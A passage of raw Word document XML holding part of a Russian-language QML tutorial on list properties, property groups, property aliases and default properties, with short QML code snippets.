        <w:t xml:space="preserve"> list&lt;&lt;objectType&gt;&gt; propertyName</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00796978" w:rsidRPr="00D815C8" w:rsidRDefault="005A6BBD" w:rsidP="00F15C30">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Если вы желаете объявить свойство для сохранения списка значений, которые не являются </w:t>
      </w:r>
      <w:r w:rsidR="009B0257" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>qml</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> типами, вам следует объявить вместо них свойство </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>var</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="008A25E2" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00796978" w:rsidRPr="00D815C8" w:rsidRDefault="005A6BBD" w:rsidP="00F15C30">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Далее показано создание </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>групп свойств</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: при помощи </w:t>
      </w:r>
      <w:r w:rsidR="005061B0" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>соглашени</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">я точки и </w:t>
      </w:r>
      <w:r w:rsidR="005061B0" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>соглашени</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>я группы.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00796978" w:rsidRPr="00D815C8" w:rsidRDefault="00796978" w:rsidP="00796978">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Text</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796978" w:rsidRPr="00D815C8" w:rsidRDefault="00796978" w:rsidP="00796978">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//group notation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00796978" w:rsidRPr="00D815C8" w:rsidRDefault="00796978" w:rsidP="00796978">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font { pixelSize: </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>12</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">; b: </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>true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796978" w:rsidRPr="00D815C8" w:rsidRDefault="00796978" w:rsidP="00796978">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eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00796978" w:rsidRPr="00D815C8" w:rsidRDefault="00796978" w:rsidP="00F15C30">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00812616" w:rsidRPr="00D815C8" w:rsidRDefault="005A6BBD" w:rsidP="00F15C30">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Псевдонимы свойств</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> – это свойства, которые удерживают ссылку на другое свойство. Псевдоним соединяет вновь созданное свойство с уже существующим свойством. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00812616" w:rsidRPr="00D815C8" w:rsidRDefault="00812616" w:rsidP="00812616">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eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>default</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang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property</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang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alias</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>name</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>: &lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>alias</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>reference</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00812616" w:rsidRPr="00D815C8" w:rsidRDefault="00812616" w:rsidP="00F15C30">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00812616" w:rsidRPr="00D815C8" w:rsidRDefault="005A6BBD" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Псевдонимы </w:t>
      </w:r>
      <w:r w:rsidR="001B43DE" w:rsidRPr="00CF5106">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>актив</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF5106">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>ируются только после полной инициализации компонента</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00812616" w:rsidRPr="00D815C8" w:rsidRDefault="005A6BBD" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Ошибка генерируется, когда ссылаются на неинициализ</w:t>
      </w:r>
      <w:r w:rsidR="008A25E2" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ир</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">ованный псевдоним. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00812616" w:rsidRPr="00D815C8" w:rsidRDefault="005A6BBD" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Также </w:t>
      </w:r>
      <w:r w:rsidRPr="00CF5106">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>нельзя создавать псевдоним псевдонима</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="008A25E2" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00812616" w:rsidRPr="00D815C8" w:rsidRDefault="005A6BBD" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Если псевдоним </w:t>
      </w:r>
      <w:r w:rsidRPr="00CF5106">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>имеет такое же имя</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, как некоторое свойство </w:t>
      </w:r>
      <w:r w:rsidR="00085476" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>объект</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">а, то он его переписывает. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00812616" w:rsidRPr="00D815C8" w:rsidRDefault="00812616" w:rsidP="00CF5106">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="23" w:name="_Toc483603878"/>
      <w:bookmarkStart w:id="24" w:name="_Toc483605098"/>
      <w:r w:rsidRPr="003D69BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Свойство по умолчанию</w:t>
      </w:r>
      <w:bookmarkEnd w:id="23"/>
      <w:bookmarkEnd w:id="24"/>
    </w:p>
    <w:p w:rsidR="005A6BBD" w:rsidRPr="00D815C8" w:rsidRDefault="005A6BBD" w:rsidP="00F15C30">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Объявление </w:t>
      </w:r>
      <w:r w:rsidR="00085476" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>объект</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">а может иметь одно свойство по умолчанию. Это свойство, которому присваивается значение, если </w:t>
      </w:r>
      <w:r w:rsidR="00085476" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>объект</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> объявляется внутри другого </w:t>
      </w:r>
      <w:r w:rsidR="00085476" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>объект</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>а без объявления значения для конкретного свойства.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00547877" w:rsidRPr="00D815C8" w:rsidRDefault="00547877" w:rsidP="00547877">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lastRenderedPageBreak/>
        <w:t>MyLabel</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47877" w:rsidRPr="00D815C8" w:rsidRDefault="00547877" w:rsidP="00547877">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Text</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> { text: </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>"world!"</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47877" w:rsidRPr="00D815C8" w:rsidRDefault="00547877" w:rsidP="00547877">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547877" w:rsidRPr="00D815C8" w:rsidRDefault="00547877" w:rsidP="00547877">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="36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This has exactly the same effect as the following:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00547877" w:rsidRPr="00D815C8" w:rsidRDefault="00547877" w:rsidP="00547877">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MyLabel</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47877" w:rsidRPr="00D815C8" w:rsidRDefault="00547877" w:rsidP="00547877">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someText: </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Text</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> { text: </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>"world!"</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FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00547877" w:rsidRPr="00D815C8" w:rsidRDefault="00547877" w:rsidP="00547877">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eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
